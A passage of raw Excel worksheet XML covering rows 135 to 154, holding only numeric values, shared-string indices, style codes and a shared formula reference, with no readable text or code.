        <v>0.588551253</v>
      </c>
      <c r="B135" s="29">
        <v>1.0</v>
      </c>
      <c r="C135" s="15"/>
      <c r="D135" s="14"/>
      <c r="E135" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F135" s="14"/>
      <c r="G135" s="29">
        <v>0.0</v>
      </c>
      <c r="H135" s="29">
        <v>68.0</v>
      </c>
      <c r="I135" s="29">
        <v>70402.0</v>
      </c>
      <c r="J135" s="15"/>
      <c r="K135" s="15"/>
      <c r="L135" s="15"/>
      <c r="M135" s="15"/>
      <c r="N135" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O135" s="29">
        <v>0.0</v>
      </c>
      <c r="P135" s="29">
        <v>2.0</v>
      </c>
      <c r="Q135" s="15"/>
      <c r="R135" s="15"/>
      <c r="S135" s="15"/>
      <c r="T135" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U135" s="5"/>
      <c r="V135" s="5"/>
      <c r="W135" s="47"/>
      <c r="X135" s="45"/>
      <c r="Y135" s="45"/>
      <c r="Z135" s="38" t="s">
        <v>1520</v>
      </c>
      <c r="AA135" s="39" t="s">
        <v>1521</v>
      </c>
      <c r="AB135" s="38" t="s">
        <v>1522</v>
      </c>
      <c r="AC135" s="40">
        <v>83818.0</v>
      </c>
      <c r="AD135" s="5"/>
      <c r="AE135" s="14"/>
      <c r="AF135" s="14"/>
    </row>
    <row r="136">
      <c r="A136" s="6">
        <f t="shared" si="1"/>
        <v>0.05500773573</v>
      </c>
      <c r="B136" s="29">
        <v>1.0</v>
      </c>
      <c r="C136" s="15"/>
      <c r="D136" s="14"/>
      <c r="E136" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F136" s="14"/>
      <c r="G136" s="29">
        <v>0.0</v>
      </c>
      <c r="H136" s="29">
        <v>478.0</v>
      </c>
      <c r="I136" s="29">
        <v>92686.0</v>
      </c>
      <c r="J136" s="15"/>
      <c r="K136" s="29">
        <v>78998.0</v>
      </c>
      <c r="L136" s="15"/>
      <c r="M136" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N136" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O136" s="29">
        <v>2.0</v>
      </c>
      <c r="P136" s="29">
        <v>0.0</v>
      </c>
      <c r="Q136" s="15"/>
      <c r="R136" s="15"/>
      <c r="S136" s="15"/>
      <c r="T136" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U136" s="5"/>
      <c r="V136" s="5"/>
      <c r="W136" s="47"/>
      <c r="X136" s="45"/>
      <c r="Y136" s="45"/>
      <c r="Z136" s="38" t="s">
        <v>1523</v>
      </c>
      <c r="AA136" s="39" t="s">
        <v>1524</v>
      </c>
      <c r="AB136" s="38" t="s">
        <v>1525</v>
      </c>
      <c r="AC136" s="40">
        <v>106269.0</v>
      </c>
      <c r="AD136" s="5"/>
      <c r="AE136" s="14"/>
      <c r="AF136" s="14"/>
    </row>
    <row r="137">
      <c r="A137" s="6">
        <f t="shared" si="1"/>
        <v>0.7088172654</v>
      </c>
      <c r="B137" s="29">
        <v>1.0</v>
      </c>
      <c r="C137" s="29">
        <v>198062.0</v>
      </c>
      <c r="D137" s="14"/>
      <c r="E137" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F137" s="14"/>
      <c r="G137" s="29">
        <v>0.0</v>
      </c>
      <c r="H137" s="29">
        <v>178.0</v>
      </c>
      <c r="I137" s="29">
        <v>10705.0</v>
      </c>
      <c r="J137" s="15"/>
      <c r="K137" s="15"/>
      <c r="L137" s="15"/>
      <c r="M137" s="15"/>
      <c r="N137" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O137" s="29">
        <v>3.0</v>
      </c>
      <c r="P137" s="29">
        <v>0.0</v>
      </c>
      <c r="Q137" s="15"/>
      <c r="R137" s="15"/>
      <c r="S137" s="15"/>
      <c r="T137" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U137" s="5"/>
      <c r="V137" s="5"/>
      <c r="W137" s="47"/>
      <c r="X137" s="45"/>
      <c r="Y137" s="45"/>
      <c r="Z137" s="38" t="s">
        <v>1526</v>
      </c>
      <c r="AA137" s="39" t="s">
        <v>1527</v>
      </c>
      <c r="AB137" s="38" t="s">
        <v>1528</v>
      </c>
      <c r="AC137" s="40">
        <v>198059.0</v>
      </c>
      <c r="AD137" s="5"/>
      <c r="AE137" s="14"/>
      <c r="AF137" s="14"/>
    </row>
    <row r="138">
      <c r="A138" s="6">
        <f t="shared" si="1"/>
        <v>0.2596358455</v>
      </c>
      <c r="B138" s="29">
        <v>1.0</v>
      </c>
      <c r="C138" s="29">
        <v>173298.0</v>
      </c>
      <c r="D138" s="14"/>
      <c r="E138" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F138" s="14"/>
      <c r="G138" s="29">
        <v>0.0</v>
      </c>
      <c r="H138" s="29">
        <v>425.0</v>
      </c>
      <c r="I138" s="29">
        <v>163582.0</v>
      </c>
      <c r="J138" s="15"/>
      <c r="K138" s="29">
        <v>98538.0</v>
      </c>
      <c r="L138" s="15"/>
      <c r="M138" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N138" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O138" s="29">
        <v>1.0</v>
      </c>
      <c r="P138" s="29">
        <v>1.0</v>
      </c>
      <c r="Q138" s="15"/>
      <c r="R138" s="15"/>
      <c r="S138" s="15"/>
      <c r="T138" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U138" s="5"/>
      <c r="V138" s="5"/>
      <c r="W138" s="47"/>
      <c r="X138" s="45"/>
      <c r="Y138" s="45"/>
      <c r="Z138" s="38" t="s">
        <v>1529</v>
      </c>
      <c r="AA138" s="39" t="s">
        <v>1530</v>
      </c>
      <c r="AB138" s="38" t="s">
        <v>1531</v>
      </c>
      <c r="AC138" s="40">
        <v>173296.0</v>
      </c>
      <c r="AD138" s="5"/>
      <c r="AE138" s="14"/>
      <c r="AF138" s="14"/>
    </row>
    <row r="139">
      <c r="A139" s="6">
        <f t="shared" si="1"/>
        <v>0.5625706661</v>
      </c>
      <c r="B139" s="29">
        <v>1.0</v>
      </c>
      <c r="C139" s="15"/>
      <c r="D139" s="14"/>
      <c r="E139" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F139" s="14"/>
      <c r="G139" s="29">
        <v>6.0</v>
      </c>
      <c r="H139" s="29">
        <v>824.0</v>
      </c>
      <c r="I139" s="29">
        <v>54722.0</v>
      </c>
      <c r="J139" s="15"/>
      <c r="K139" s="29">
        <v>-1.0</v>
      </c>
      <c r="L139" s="15"/>
      <c r="M139" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N139" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O139" s="29">
        <v>1.0</v>
      </c>
      <c r="P139" s="29">
        <v>0.0</v>
      </c>
      <c r="Q139" s="15"/>
      <c r="R139" s="15"/>
      <c r="S139" s="15"/>
      <c r="T139" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U139" s="5"/>
      <c r="V139" s="5"/>
      <c r="W139" s="47"/>
      <c r="X139" s="45"/>
      <c r="Y139" s="45"/>
      <c r="Z139" s="38" t="s">
        <v>1532</v>
      </c>
      <c r="AA139" s="39" t="s">
        <v>1533</v>
      </c>
      <c r="AB139" s="38" t="s">
        <v>1534</v>
      </c>
      <c r="AC139" s="40">
        <v>126498.0</v>
      </c>
      <c r="AD139" s="5"/>
      <c r="AE139" s="14"/>
      <c r="AF139" s="14"/>
    </row>
    <row r="140">
      <c r="A140" s="6">
        <f t="shared" si="1"/>
        <v>0.886537942</v>
      </c>
      <c r="B140" s="29">
        <v>1.0</v>
      </c>
      <c r="C140" s="14"/>
      <c r="D140" s="14"/>
      <c r="E140" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F140" s="14"/>
      <c r="G140" s="29">
        <v>0.0</v>
      </c>
      <c r="H140" s="29">
        <v>132.0</v>
      </c>
      <c r="I140" s="29">
        <v>217583.0</v>
      </c>
      <c r="J140" s="15"/>
      <c r="K140" s="15"/>
      <c r="L140" s="15"/>
      <c r="M140" s="15"/>
      <c r="N140" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O140" s="29">
        <v>1.0</v>
      </c>
      <c r="P140" s="29">
        <v>2.0</v>
      </c>
      <c r="Q140" s="15"/>
      <c r="R140" s="15"/>
      <c r="S140" s="15"/>
      <c r="T140" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U140" s="5"/>
      <c r="V140" s="5"/>
      <c r="W140" s="47"/>
      <c r="X140" s="45"/>
      <c r="Y140" s="45"/>
      <c r="Z140" s="38" t="s">
        <v>1535</v>
      </c>
      <c r="AA140" s="39" t="s">
        <v>1536</v>
      </c>
      <c r="AB140" s="38" t="s">
        <v>1537</v>
      </c>
      <c r="AC140" s="40">
        <v>217943.0</v>
      </c>
      <c r="AD140" s="5"/>
      <c r="AE140" s="14"/>
      <c r="AF140" s="14"/>
    </row>
    <row r="141">
      <c r="A141" s="6">
        <f t="shared" si="1"/>
        <v>0.731645868</v>
      </c>
      <c r="B141" s="29">
        <v>1.0</v>
      </c>
      <c r="C141" s="29">
        <v>200198.0</v>
      </c>
      <c r="D141" s="14"/>
      <c r="E141" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F141" s="14"/>
      <c r="G141" s="29">
        <v>2.0</v>
      </c>
      <c r="H141" s="29">
        <v>632.0</v>
      </c>
      <c r="I141" s="29">
        <v>161472.0</v>
      </c>
      <c r="J141" s="15"/>
      <c r="K141" s="29">
        <v>161472.0</v>
      </c>
      <c r="L141" s="15"/>
      <c r="M141" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N141" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O141" s="29">
        <v>1.0</v>
      </c>
      <c r="P141" s="29">
        <v>0.0</v>
      </c>
      <c r="Q141" s="15"/>
      <c r="R141" s="15"/>
      <c r="S141" s="15"/>
      <c r="T141" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U141" s="5"/>
      <c r="V141" s="5"/>
      <c r="W141" s="47"/>
      <c r="X141" s="45"/>
      <c r="Y141" s="45"/>
      <c r="Z141" s="38" t="s">
        <v>1538</v>
      </c>
      <c r="AA141" s="39" t="s">
        <v>1539</v>
      </c>
      <c r="AB141" s="38" t="s">
        <v>1304</v>
      </c>
      <c r="AC141" s="40">
        <v>200193.0</v>
      </c>
      <c r="AD141" s="5"/>
      <c r="AE141" s="14"/>
      <c r="AF141" s="14"/>
    </row>
    <row r="142">
      <c r="A142" s="6">
        <f t="shared" si="1"/>
        <v>0.3668614445</v>
      </c>
      <c r="B142" s="29">
        <v>1.0</v>
      </c>
      <c r="C142" s="29">
        <v>43762.0</v>
      </c>
      <c r="D142" s="14"/>
      <c r="E142" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F142" s="14"/>
      <c r="G142" s="29">
        <v>1.0</v>
      </c>
      <c r="H142" s="29">
        <v>520.0</v>
      </c>
      <c r="I142" s="29">
        <v>31903.0</v>
      </c>
      <c r="J142" s="15"/>
      <c r="K142" s="29">
        <v>31903.0</v>
      </c>
      <c r="L142" s="15"/>
      <c r="M142" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N142" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O142" s="29">
        <v>3.0</v>
      </c>
      <c r="P142" s="29">
        <v>0.0</v>
      </c>
      <c r="Q142" s="15"/>
      <c r="R142" s="15"/>
      <c r="S142" s="15"/>
      <c r="T142" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U142" s="5"/>
      <c r="V142" s="5"/>
      <c r="W142" s="47"/>
      <c r="X142" s="45"/>
      <c r="Y142" s="45"/>
      <c r="Z142" s="38" t="s">
        <v>1540</v>
      </c>
      <c r="AA142" s="39" t="s">
        <v>1541</v>
      </c>
      <c r="AB142" s="38" t="s">
        <v>1542</v>
      </c>
      <c r="AC142" s="40">
        <v>43755.0</v>
      </c>
      <c r="AD142" s="5"/>
      <c r="AE142" s="14"/>
      <c r="AF142" s="14"/>
    </row>
    <row r="143">
      <c r="A143" s="6">
        <f t="shared" si="1"/>
        <v>0.3001886163</v>
      </c>
      <c r="B143" s="29">
        <v>1.0</v>
      </c>
      <c r="C143" s="14"/>
      <c r="D143" s="14"/>
      <c r="E143" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F143" s="14"/>
      <c r="G143" s="29">
        <v>0.0</v>
      </c>
      <c r="H143" s="29">
        <v>231.0</v>
      </c>
      <c r="I143" s="29">
        <v>226913.0</v>
      </c>
      <c r="J143" s="15"/>
      <c r="K143" s="15"/>
      <c r="L143" s="15"/>
      <c r="M143" s="14"/>
      <c r="N143" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O143" s="29">
        <v>2.0</v>
      </c>
      <c r="P143" s="29">
        <v>1.0</v>
      </c>
      <c r="Q143" s="15"/>
      <c r="R143" s="15"/>
      <c r="S143" s="15"/>
      <c r="T143" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U143" s="5"/>
      <c r="V143" s="5"/>
      <c r="W143" s="47"/>
      <c r="X143" s="45"/>
      <c r="Y143" s="45"/>
      <c r="Z143" s="38" t="s">
        <v>1543</v>
      </c>
      <c r="AA143" s="39" t="s">
        <v>1544</v>
      </c>
      <c r="AB143" s="38" t="s">
        <v>1545</v>
      </c>
      <c r="AC143" s="40">
        <v>225729.0</v>
      </c>
      <c r="AD143" s="5"/>
      <c r="AE143" s="14"/>
      <c r="AF143" s="14"/>
    </row>
    <row r="144">
      <c r="A144" s="6">
        <f t="shared" si="1"/>
        <v>0.1707513957</v>
      </c>
      <c r="B144" s="29">
        <v>1.0</v>
      </c>
      <c r="C144" s="29">
        <v>83537.0</v>
      </c>
      <c r="D144" s="14"/>
      <c r="E144" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F144" s="14"/>
      <c r="G144" s="29">
        <v>2.0</v>
      </c>
      <c r="H144" s="29">
        <v>756.0</v>
      </c>
      <c r="I144" s="29">
        <v>70041.0</v>
      </c>
      <c r="J144" s="15"/>
      <c r="K144" s="29">
        <v>70041.0</v>
      </c>
      <c r="L144" s="15"/>
      <c r="M144" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N144" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O144" s="29">
        <v>2.0</v>
      </c>
      <c r="P144" s="29">
        <v>8.0</v>
      </c>
      <c r="Q144" s="15"/>
      <c r="R144" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S144" s="15"/>
      <c r="T144" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U144" s="5"/>
      <c r="V144" s="5"/>
      <c r="W144" s="47"/>
      <c r="X144" s="45"/>
      <c r="Y144" s="45"/>
      <c r="Z144" s="38" t="s">
        <v>1546</v>
      </c>
      <c r="AA144" s="39" t="s">
        <v>1547</v>
      </c>
      <c r="AB144" s="38" t="s">
        <v>1548</v>
      </c>
      <c r="AC144" s="40">
        <v>83534.0</v>
      </c>
      <c r="AD144" s="5"/>
      <c r="AE144" s="14"/>
      <c r="AF144" s="14"/>
    </row>
    <row r="145">
      <c r="A145" s="6">
        <f t="shared" si="1"/>
        <v>0.04210773363</v>
      </c>
      <c r="B145" s="29">
        <v>1.0</v>
      </c>
      <c r="C145" s="15"/>
      <c r="D145" s="14"/>
      <c r="E145" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F145" s="14"/>
      <c r="G145" s="29">
        <v>2.0</v>
      </c>
      <c r="H145" s="29">
        <v>2098.0</v>
      </c>
      <c r="I145" s="29">
        <v>222863.0</v>
      </c>
      <c r="J145" s="15"/>
      <c r="K145" s="29">
        <v>6253.0</v>
      </c>
      <c r="L145" s="15"/>
      <c r="M145" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N145" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O145" s="29">
        <v>2.0</v>
      </c>
      <c r="P145" s="29">
        <v>1.0</v>
      </c>
      <c r="Q145" s="15"/>
      <c r="R145" s="15"/>
      <c r="S145" s="15"/>
      <c r="T145" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U145" s="5"/>
      <c r="V145" s="5"/>
      <c r="W145" s="47"/>
      <c r="X145" s="45"/>
      <c r="Y145" s="45"/>
      <c r="Z145" s="38" t="s">
        <v>1549</v>
      </c>
      <c r="AA145" s="39" t="s">
        <v>1550</v>
      </c>
      <c r="AB145" s="38" t="s">
        <v>1551</v>
      </c>
      <c r="AC145" s="40">
        <v>224393.0</v>
      </c>
      <c r="AD145" s="5"/>
      <c r="AE145" s="14"/>
      <c r="AF145" s="14"/>
    </row>
    <row r="146">
      <c r="A146" s="6">
        <f t="shared" si="1"/>
        <v>0.3407570554</v>
      </c>
      <c r="B146" s="29">
        <v>1.0</v>
      </c>
      <c r="C146" s="14"/>
      <c r="D146" s="14"/>
      <c r="E146" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F146" s="14"/>
      <c r="G146" s="29">
        <v>2.0</v>
      </c>
      <c r="H146" s="29">
        <v>312.0</v>
      </c>
      <c r="I146" s="29">
        <v>165643.0</v>
      </c>
      <c r="J146" s="15"/>
      <c r="K146" s="29">
        <v>165643.0</v>
      </c>
      <c r="L146" s="15"/>
      <c r="M146" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N146" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O146" s="29">
        <v>1.0</v>
      </c>
      <c r="P146" s="29">
        <v>6.0</v>
      </c>
      <c r="Q146" s="15"/>
      <c r="R146" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S146" s="15"/>
      <c r="T146" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U146" s="5"/>
      <c r="V146" s="5"/>
      <c r="W146" s="47"/>
      <c r="X146" s="45"/>
      <c r="Y146" s="45"/>
      <c r="Z146" s="38" t="s">
        <v>1552</v>
      </c>
      <c r="AA146" s="39" t="s">
        <v>1553</v>
      </c>
      <c r="AB146" s="38" t="s">
        <v>1554</v>
      </c>
      <c r="AC146" s="40">
        <v>175068.0</v>
      </c>
      <c r="AD146" s="5"/>
      <c r="AE146" s="14"/>
      <c r="AF146" s="14"/>
    </row>
    <row r="147">
      <c r="A147" s="6">
        <f t="shared" si="1"/>
        <v>0.2835922967</v>
      </c>
      <c r="B147" s="29">
        <v>1.0</v>
      </c>
      <c r="C147" s="15"/>
      <c r="D147" s="14"/>
      <c r="E147" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F147" s="14"/>
      <c r="G147" s="29">
        <v>0.0</v>
      </c>
      <c r="H147" s="29">
        <v>198.0</v>
      </c>
      <c r="I147" s="29">
        <v>271729.0</v>
      </c>
      <c r="J147" s="15"/>
      <c r="K147" s="15"/>
      <c r="L147" s="15"/>
      <c r="M147" s="15"/>
      <c r="N147" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O147" s="29">
        <v>1.0</v>
      </c>
      <c r="P147" s="29">
        <v>1.0</v>
      </c>
      <c r="Q147" s="15"/>
      <c r="R147" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S147" s="15"/>
      <c r="T147" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U147" s="5"/>
      <c r="V147" s="5"/>
      <c r="W147" s="47"/>
      <c r="X147" s="45"/>
      <c r="Y147" s="45"/>
      <c r="Z147" s="38" t="s">
        <v>1555</v>
      </c>
      <c r="AA147" s="39" t="s">
        <v>1556</v>
      </c>
      <c r="AB147" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC147" s="40">
        <v>258147.0</v>
      </c>
      <c r="AD147" s="5"/>
      <c r="AE147" s="14"/>
      <c r="AF147" s="14"/>
    </row>
    <row r="148">
      <c r="A148" s="6">
        <f t="shared" si="1"/>
        <v>0.1686320481</v>
      </c>
      <c r="B148" s="29">
        <v>1.0</v>
      </c>
      <c r="C148" s="29">
        <v>195145.0</v>
      </c>
      <c r="D148" s="14"/>
      <c r="E148" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F148" s="14"/>
      <c r="G148" s="29">
        <v>0.0</v>
      </c>
      <c r="H148" s="29">
        <v>322.0</v>
      </c>
      <c r="I148" s="29">
        <v>68190.0</v>
      </c>
      <c r="J148" s="15"/>
      <c r="K148" s="29">
        <v>68190.0</v>
      </c>
      <c r="L148" s="15"/>
      <c r="M148" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N148" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O148" s="29">
        <v>1.0</v>
      </c>
      <c r="P148" s="29">
        <v>4.0</v>
      </c>
      <c r="Q148" s="15"/>
      <c r="R148" s="15"/>
      <c r="S148" s="15"/>
      <c r="T148" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U148" s="5"/>
      <c r="V148" s="5"/>
      <c r="W148" s="47"/>
      <c r="X148" s="45"/>
      <c r="Y148" s="45"/>
      <c r="Z148" s="38" t="s">
        <v>1557</v>
      </c>
      <c r="AA148" s="39" t="s">
        <v>1558</v>
      </c>
      <c r="AB148" s="38" t="s">
        <v>1559</v>
      </c>
      <c r="AC148" s="40">
        <v>195144.0</v>
      </c>
      <c r="AD148" s="5"/>
      <c r="AE148" s="14"/>
      <c r="AF148" s="14"/>
    </row>
    <row r="149">
      <c r="A149" s="6">
        <f t="shared" si="1"/>
        <v>0.7534578958</v>
      </c>
      <c r="B149" s="29">
        <v>1.0</v>
      </c>
      <c r="C149" s="29">
        <v>123200.0</v>
      </c>
      <c r="D149" s="14"/>
      <c r="E149" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F149" s="14"/>
      <c r="G149" s="29">
        <v>1.0</v>
      </c>
      <c r="H149" s="29">
        <v>167.0</v>
      </c>
      <c r="I149" s="29">
        <v>4041.0</v>
      </c>
      <c r="J149" s="15"/>
      <c r="K149" s="15"/>
      <c r="L149" s="15"/>
      <c r="M149" s="14"/>
      <c r="N149" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O149" s="29">
        <v>1.0</v>
      </c>
      <c r="P149" s="29">
        <v>4.0</v>
      </c>
      <c r="Q149" s="15"/>
      <c r="R149" s="15"/>
      <c r="S149" s="15"/>
      <c r="T149" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U149" s="5"/>
      <c r="V149" s="5"/>
      <c r="W149" s="47"/>
      <c r="X149" s="45"/>
      <c r="Y149" s="45"/>
      <c r="Z149" s="38" t="s">
        <v>1560</v>
      </c>
      <c r="AA149" s="39" t="s">
        <v>1561</v>
      </c>
      <c r="AB149" s="38" t="s">
        <v>1562</v>
      </c>
      <c r="AC149" s="40">
        <v>123196.0</v>
      </c>
      <c r="AD149" s="5"/>
      <c r="AE149" s="14"/>
      <c r="AF149" s="14"/>
    </row>
    <row r="150">
      <c r="A150" s="6">
        <f t="shared" si="1"/>
        <v>0.03012939065</v>
      </c>
      <c r="B150" s="29">
        <v>1.0</v>
      </c>
      <c r="C150" s="29">
        <v>159337.0</v>
      </c>
      <c r="D150" s="14"/>
      <c r="E150" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F150" s="14"/>
      <c r="G150" s="29">
        <v>250.0</v>
      </c>
      <c r="H150" s="29">
        <v>82764.0</v>
      </c>
      <c r="I150" s="29">
        <v>37.0</v>
      </c>
      <c r="J150" s="15"/>
      <c r="K150" s="29">
        <v>95381.0</v>
      </c>
      <c r="L150" s="15"/>
      <c r="M150" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N150" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O150" s="29">
        <v>10.0</v>
      </c>
      <c r="P150" s="29">
        <v>16.0</v>
      </c>
      <c r="Q150" s="15"/>
      <c r="R150" s="15"/>
      <c r="S150" s="15"/>
      <c r="T150" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U150" s="5"/>
      <c r="V150" s="5"/>
      <c r="W150" s="47"/>
      <c r="X150" s="45"/>
      <c r="Y150" s="45"/>
      <c r="Z150" s="38" t="s">
        <v>1563</v>
      </c>
      <c r="AA150" s="39" t="s">
        <v>1564</v>
      </c>
      <c r="AB150" s="38" t="s">
        <v>1565</v>
      </c>
      <c r="AC150" s="40">
        <v>159331.0</v>
      </c>
      <c r="AD150" s="5"/>
      <c r="AE150" s="14"/>
      <c r="AF150" s="14"/>
    </row>
    <row r="151">
      <c r="A151" s="6">
        <f t="shared" si="1"/>
        <v>0.8329660969</v>
      </c>
      <c r="B151" s="29">
        <v>1.0</v>
      </c>
      <c r="C151" s="14"/>
      <c r="D151" s="14"/>
      <c r="E151" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F151" s="14"/>
      <c r="G151" s="29">
        <v>2.0</v>
      </c>
      <c r="H151" s="29">
        <v>306.0</v>
      </c>
      <c r="I151" s="29">
        <v>195491.0</v>
      </c>
      <c r="J151" s="15"/>
      <c r="K151" s="15"/>
      <c r="L151" s="15"/>
      <c r="M151" s="14"/>
      <c r="N151" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O151" s="29">
        <v>0.0</v>
      </c>
      <c r="P151" s="29">
        <v>4.0</v>
      </c>
      <c r="Q151" s="15"/>
      <c r="R151" s="15"/>
      <c r="S151" s="15"/>
      <c r="T151" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U151" s="5"/>
      <c r="V151" s="5"/>
      <c r="W151" s="47"/>
      <c r="X151" s="45"/>
      <c r="Y151" s="45"/>
      <c r="Z151" s="38" t="s">
        <v>1566</v>
      </c>
      <c r="AA151" s="39" t="s">
        <v>1567</v>
      </c>
      <c r="AB151" s="38" t="s">
        <v>1568</v>
      </c>
      <c r="AC151" s="40">
        <v>200463.0</v>
      </c>
      <c r="AD151" s="5"/>
      <c r="AE151" s="14"/>
      <c r="AF151" s="14"/>
    </row>
    <row r="152">
      <c r="A152" s="6">
        <f t="shared" si="1"/>
        <v>0.9096380924</v>
      </c>
      <c r="B152" s="29">
        <v>1.0</v>
      </c>
      <c r="C152" s="15"/>
      <c r="D152" s="14"/>
      <c r="E152" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F152" s="14"/>
      <c r="G152" s="29">
        <v>1.0</v>
      </c>
      <c r="H152" s="29">
        <v>271.0</v>
      </c>
      <c r="I152" s="29">
        <v>93838.0</v>
      </c>
      <c r="J152" s="15"/>
      <c r="K152" s="29">
        <v>86741.0</v>
      </c>
      <c r="L152" s="15"/>
      <c r="M152" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N152" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O152" s="29">
        <v>1.0</v>
      </c>
      <c r="P152" s="29">
        <v>1.0</v>
      </c>
      <c r="Q152" s="15"/>
      <c r="R152" s="15"/>
      <c r="S152" s="15"/>
      <c r="T152" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U152" s="5"/>
      <c r="V152" s="5"/>
      <c r="W152" s="47"/>
      <c r="X152" s="45"/>
      <c r="Y152" s="45"/>
      <c r="Z152" s="38" t="s">
        <v>1569</v>
      </c>
      <c r="AA152" s="39" t="s">
        <v>1570</v>
      </c>
      <c r="AB152" s="38" t="s">
        <v>1571</v>
      </c>
      <c r="AC152" s="40">
        <v>178150.0</v>
      </c>
      <c r="AD152" s="5"/>
      <c r="AE152" s="14"/>
      <c r="AF152" s="14"/>
    </row>
    <row r="153">
      <c r="A153" s="6">
        <f t="shared" si="1"/>
        <v>0.07800770502</v>
      </c>
      <c r="B153" s="29">
        <v>1.0</v>
      </c>
      <c r="C153" s="15"/>
      <c r="D153" s="14"/>
      <c r="E153" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F153" s="14"/>
      <c r="G153" s="29">
        <v>1.0</v>
      </c>
      <c r="H153" s="29">
        <v>114.0</v>
      </c>
      <c r="I153" s="29">
        <v>127674.0</v>
      </c>
      <c r="J153" s="15"/>
      <c r="K153" s="29">
        <v>111626.0</v>
      </c>
      <c r="L153" s="15"/>
      <c r="M153" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N153" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O153" s="29">
        <v>0.0</v>
      </c>
      <c r="P153" s="29">
        <v>2.0</v>
      </c>
      <c r="Q153" s="15"/>
      <c r="R153" s="15"/>
      <c r="S153" s="15"/>
      <c r="T153" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U153" s="5"/>
      <c r="V153" s="5"/>
      <c r="W153" s="47"/>
      <c r="X153" s="45"/>
      <c r="Y153" s="45"/>
      <c r="Z153" s="38" t="s">
        <v>1572</v>
      </c>
      <c r="AA153" s="39" t="s">
        <v>1573</v>
      </c>
      <c r="AB153" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC153" s="40">
        <v>139894.0</v>
      </c>
      <c r="AD153" s="5"/>
      <c r="AE153" s="14"/>
      <c r="AF153" s="14"/>
    </row>
    <row r="154">
      <c r="A154" s="6">
        <f t="shared" si="1"/>
        <v>0.368406226</v>
      </c>
      <c r="B154" s="29">
        <v>1.0</v>
      </c>
      <c r="C154" s="29">
        <v>108235.0</v>
      </c>
      <c r="D154" s="14"/>
      <c r="E154" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F154" s="14"/>
      <c r="G154" s="29">
        <v>1.0</v>
      </c>
      <c r="H154" s="29">
        <v>175.0</v>
      </c>
      <c r="I154" s="29">
        <v>16498.0</v>
      </c>
      <c r="J154" s="15"/>
      <c r="K154" s="29">
        <v>45523.0</v>
      </c>
      <c r="L154" s="15"/>
      <c r="M154" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N154" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O154" s="29">
        <v>1.0</v>
      </c>
      <c r="P154" s="29">
        <v>0.0</v>
      </c>
      <c r="Q154" s="15"/>
      <c r="R154" s="15"/>
      <c r="S154" s="15"/>
      <c r="T154" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U154" s="5"/>
      <c r="V154" s="5"/>
      <c r="W154" s="47"/>
